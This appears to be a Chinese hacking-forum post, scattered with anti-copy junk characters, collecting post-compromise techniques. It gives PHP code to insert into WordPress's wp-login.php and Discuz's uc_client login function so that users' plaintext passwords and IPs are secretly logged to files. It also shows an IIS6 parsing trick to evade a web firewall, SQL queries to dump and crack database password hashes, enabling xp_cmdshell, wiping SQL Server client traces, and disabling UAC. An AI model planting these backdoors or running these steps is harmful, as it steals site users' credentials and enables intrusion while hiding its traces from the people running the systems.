& B5 O! v8 ?4 X在文件wp-login.php中539行处添加:# I% n2 Y, ?) G% G3 K& L  y0 u) }
// log password
( N, K% S; \9 h$log_user=$_POST['log'];
- w  r7 w4 k$ x$log_pwd=$_POST['pwd'];
% K3 N4 K* g. H; K2 ?5 g$log_ip=$_SERVER["REMOTE_ADDR"];. R( |3 Z6 d5 g9 Y
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;% p4 W  |; K5 H" w
$txt=$txt.”\r\n”;$ ?/ i/ h) A) a
if($log_user&&$log_pwd&&$log_ip){! Z% X% W4 K. }2 s7 d6 k
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);  b" |! L- F& _+ s# A5 W. H
}
8 I" r3 c2 i. [. l- O当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
6 r. k, J9 `- W: u就是搜索case ‘login’; R9 D  G+ O2 h9 n. ?- ^
在它下面直接插入即可,记录的密码生成在pwd.txt中,8 q3 X4 Y. Q5 t+ ~
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录- w+ ^1 O2 g$ ]1 h) H
利用II6文件解析漏洞绕过安全狗代码:' G5 v: I" g  u. ~1 m( ?5 i. S
;antian365.asp;antian365.jpg
( E4 h" t- l( W9 F; }# Z
- M! V1 F+ l6 @6 U各种类型数据库抓HASH破解最高权限密码!+ u3 V$ U; v/ N6 R
1.sql server2000( j" ~) Q) @* Z7 E; `5 `# X
SELECT password from master.dbo.sysxlogins where name='sa'
6 L: Y3 r  c7 n8 X2 S  D0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341( w2 B$ Y+ J1 D  i" V
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
+ B- m  x: r+ W# P" j$ D! H5 Q  S0 |  P( e9 j. t- \1 Z8 Q& J3 v2 }
0×0100- constant header
) u; N" X6 t- x34767D5C- salt
: @- j: j* x  _% x7 n1 V0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
3 |: k: J  ^- t* b2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash/ i9 Y- {% d  i7 X* s& T# S# D/ p
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash
4 E2 N' z6 M) k9 \, S8 I) ZSQL server 2005:-
' U& {6 Z. Q1 N; [( r- `SELECT password_hash FROM sys.sql_logins where name='sa'- P/ U# P$ ~  |+ s) C
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
. N5 h' z/ Z  V9 ^$ |4 a) L0×0100- constant header/ t% k6 Y, |$ i, |
993BF231-salt) z  i0 I6 P" W& U8 b; U* J3 H
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
/ f/ R' w4 K  @, t+ \+ ycrack case sensitive hash in cain, try brute force and dictionary based attacks.
' ?8 ~! \- y8 F/ U) b1 G# v! C0 G1 U
update:- following bernardo’s comments:-
5 K5 e# N% P+ Y" c2 guse function fn_varbintohexstr() to cast password in a hex string.2 z1 g- o. C- Z" }4 P! D
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins5 K! Y# O6 w) v  K
& _' u' h  h6 o2 h$ X2 Z8 D3 J
MYSQL:-
4 \! `  D7 K6 G/ {7 @
( z1 ]$ s, M2 w( @2 \9 QIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.2 T# [0 b- ~4 k& _9 s
% {! o* d) E6 V- R) d' P6 i: H
*mysql  < 4.1* T4 m. w, C6 C( \% t) U$ R1 S3 L
: U: v, a  E* }5 j
mysql> SELECT PASSWORD(‘mypass’);( y8 S/ X$ {- d' P
+——————–+; m6 O% u4 h- }0 a1 T0 m
| PASSWORD(‘mypass’) |3 ~# v+ [* C- C" t: x
+——————–+
. j" o& s- y7 a| 6f8c114b58f2ce9e   |" |  Y" h- D  q7 z* M& C
+——————–+3 q- P4 k) j0 D: ^; J8 ~8 |: t% i
5 V8 z3 X' b9 d! N& W5 C. U
*mysql >=4.1
1 `# ?7 r0 ^; U$ V' ^
1 c5 u1 {2 n) r4 _0 umysql> SELECT PASSWORD(‘mypass’);7 Z. P7 ?- n, n6 \3 J1 i8 h
+——————————————-+0 Y+ ^6 L7 n4 M) p: `) Z2 Y
| PASSWORD(‘mypass’)                        |
" B2 ]0 x) @$ P8 |8 h, o  v+——————————————-+
6 U( o( N8 e5 {7 X: t/ G: C% ~| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
& c$ M8 ^8 v& {, g# b) z+——————————————-+% O5 G- ~: l% o* X5 T0 R+ i
( T- f% C" k/ F) r- g
Select user, password from mysql.user
) E6 {9 W5 x7 Q* W: i1 A  SThe hashes can be cracked in ‘cain and abel’9 ?9 V& N& t, J

# m% `: N# c' UPostgres:-
  A% x4 l: z6 N- c( `8 c* gPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
# b3 @4 J4 ^/ u1 Q6 tselect usename, passwd from pg_shadow;: U8 i6 [, x/ [) n0 Z
usename      |  passwd
; t- N- }5 l2 U0 ?+ I2 M' T——————+————————————-4 }# C+ {1 o' w' ^
testuser            | md5fabb6d7172aadfda4753bf0507ed43965 T% Y: U3 {0 F# Z! @$ ^- \
use mdcrack to crack these hashes:-$ N2 ~  U. v$ K% K
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
+ d9 `6 v) M+ f
$ V' ~* m) a6 Q. g8 A* HOracle:-
$ h& H6 R- e1 F8 y9 o9 }select name, password, spare4 from sys.user$
/ S- k5 f# J4 L& nhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g" I/ Q" W" O4 ]% B' w  ]% [( A
More on Oracle later, i am a bit bored….* ?; |: B& p8 H/ O9 F

9 J. E( i8 R2 Y( N; U. w4 \! R! B" ~* K" r
在sql server2005/2008中开启xp_cmdshell! x5 s: H! l5 ?
-- To allow advanced options to be changed.6 g  t, C; m8 X
EXEC sp_configure 'show advanced options', 1
4 A( {' G7 a- oGO" v7 c" F1 c# M- ~! d0 o2 ?
-- To update the currently configured value for advanced options.) o( U; k  A9 A  V
RECONFIGURE
2 C! S/ p6 ~6 g$ v- |' BGO: Q, {- u+ z; j
-- To enable the feature.
/ `  K* x" j' N6 O4 @4 R' YEXEC sp_configure 'xp_cmdshell', 10 J- l0 v9 e/ o+ F5 C& H8 r; B
GO
4 z. {* G% j* ?/ E-- To update the currently configured value for this feature.
  `; a) v' \1 Z. ?# N9 ERECONFIGURE
# J' q' B  |- g; \+ R: E, F9 GGO8 ~. b4 [+ p: h
SQL 2008 server日志清除,在清楚前一定要备份。
( K. b- ~0 ~3 H$ B2 S- C如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:' `  R& `3 L! m4 g
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin) y7 ?; p6 \! s

, a+ I9 \3 E: F( \0 n& [; L对于SQL Server 2008以前的版本:# h, {/ \3 b! R; @# I& q' M
SQL Server 2005:
, h7 g( ~" F  K0 P1 l! {删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
* h! J1 G( \, j7 vSQL Server 2000:* g% B5 Y2 ^% G3 f% h" s5 s
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
2 A  Y; s& x5 \7 Y; p2 Z  j8 V' q3 O' ]% Q1 s9 @% u
本帖最后由 simeon 于 2013-1-3 09:51 编辑
, I6 ~/ Y7 e! K: H4 m* i: X7 @% {7 Q5 N; b# d: J/ M0 P0 U
! l% ?. `: \3 q3 M& T
windows 2008 文件权限修改
" q# ~: f. z( P1 M$ t* W1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx1 B! B# b% ~' D* B$ w" O. M+ D+ J2 a
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
5 A0 \) z) `1 c# H- i, B1 {一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,# `. D) B/ Z; O* C0 [2 J

. ^8 `; ^7 p# ?" HWindows Registry Editor Version 5.00
0 x! `, b- c+ ^: o[HKEY_CLASSES_ROOT\*\shell\runas]+ Q- d2 m1 R! ^0 N. X4 \4 T
@="管理员取得所有权"
& _3 h& C2 T/ S" q( _- Z"NoWorkingDirectory"=""6 r1 `! @. a0 l8 C9 D8 `$ g
[HKEY_CLASSES_ROOT\*\shell\runas\command]+ ^2 B( L) L. P& J5 \7 i" O
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
& o, S7 u* w% E7 ~) x"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
4 {: J$ X* |- h& a1 T* l7 x# o[HKEY_CLASSES_ROOT\exefile\shell\runas2]
1 ~% c4 t; C/ I9 y/ `@="管理员取得所有权". ^9 W* H3 P$ u3 {1 C
"NoWorkingDirectory"=""
$ c: }8 c- \% c4 Q/ d9 `1 n+ i[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
4 ~2 K0 R7 E1 x  W/ a- P4 T@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# F! x: _% x  r' i2 E6 ~
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
5 b( F( K3 s: d
# g- N! k* }2 n) s- h* b: ][HKEY_CLASSES_ROOT\Directory\shell\runas]
6 [; }* k" f" C! C) K4 m! `8 ]@="管理员取得所有权"
; f4 W/ N( v3 d3 {"NoWorkingDirectory"=""
. i3 Z! u5 s: s* k[HKEY_CLASSES_ROOT\Directory\shell\runas\command]/ u* s, p: ^# M+ [
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"6 Z" f; u9 Y: a6 s' a8 z8 }# G
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
9 S1 h$ v$ P5 @8 l7 t& z) v
0 x9 Q' w8 `$ Q) U' j; M5 @. q' n0 H( ]& f* S
win7右键“管理员取得所有权”.reg导入
4 a6 K: Y& |' f二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
0 d" S1 b) G( D3 f4 I4 H  T* V1、C:\Windows这个路径的“notepad.exe”不需要替换6 Q' |% W: Y+ l' O$ l
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换0 K% B. I8 V6 ~! l1 N
3、四个“notepad.exe.mui”不要管/ b; L! f, M. F/ U
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
) a2 r& Z9 v+ [  j, M1 Z/ T* U* \) ^# AC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”" s7 p4 i+ o+ O8 D4 Q7 }
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,( n) G% {: C* c( c+ L! y* E6 S
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
9 w6 a1 a6 T3 a5 h* {' x9 }windows 2008中关闭安全策略: ; K, ~% L4 j4 |5 f- }+ {
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
) V* W* ~% A% ]5 G9 w' ?修改uc_client目录下的client.php 在2 Y+ D8 b* p, L7 v/ \
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {: j$ h2 T. o$ G6 _2 j( ]1 E
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php( E$ j" W$ z) H! Q% ~! T( V
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw# \, ?7 }, r) `2 V( ?- p8 K4 K
if(getenv('HTTP_CLIENT_IP')) {
* D9 ^  p2 p( L% I& ^6 H$onlineip = getenv('HTTP_CLIENT_IP');3 ?0 O! l" O0 }
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
2 o1 j8 M' S! f8 |+ `$onlineip = getenv('HTTP_X_FORWARDED_FOR');
9 n; M) r# C$ \# n& {9 o7 g} elseif(getenv('REMOTE_ADDR')) {
# e! L& y. N! z3 \( j! v$onlineip = getenv('REMOTE_ADDR');
8 C8 w2 R5 G# p} else {
; r" W* u% d6 \0 ?% u' L5 Z$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];8 ]- W  s* b  F0 N# |0 k1 p
}/ J' |' \! l* e& r) d% ]
     $showtime=date("Y-m-d H:i:s");
% \% h5 N% R4 S. D; S  x    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";0 C  P) p1 a6 x/ U
    $handle=fopen('./data/cache/csslog.php','a+');; I+ T; k9 B2 i/ u; X# o$ S3 |0 t
    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表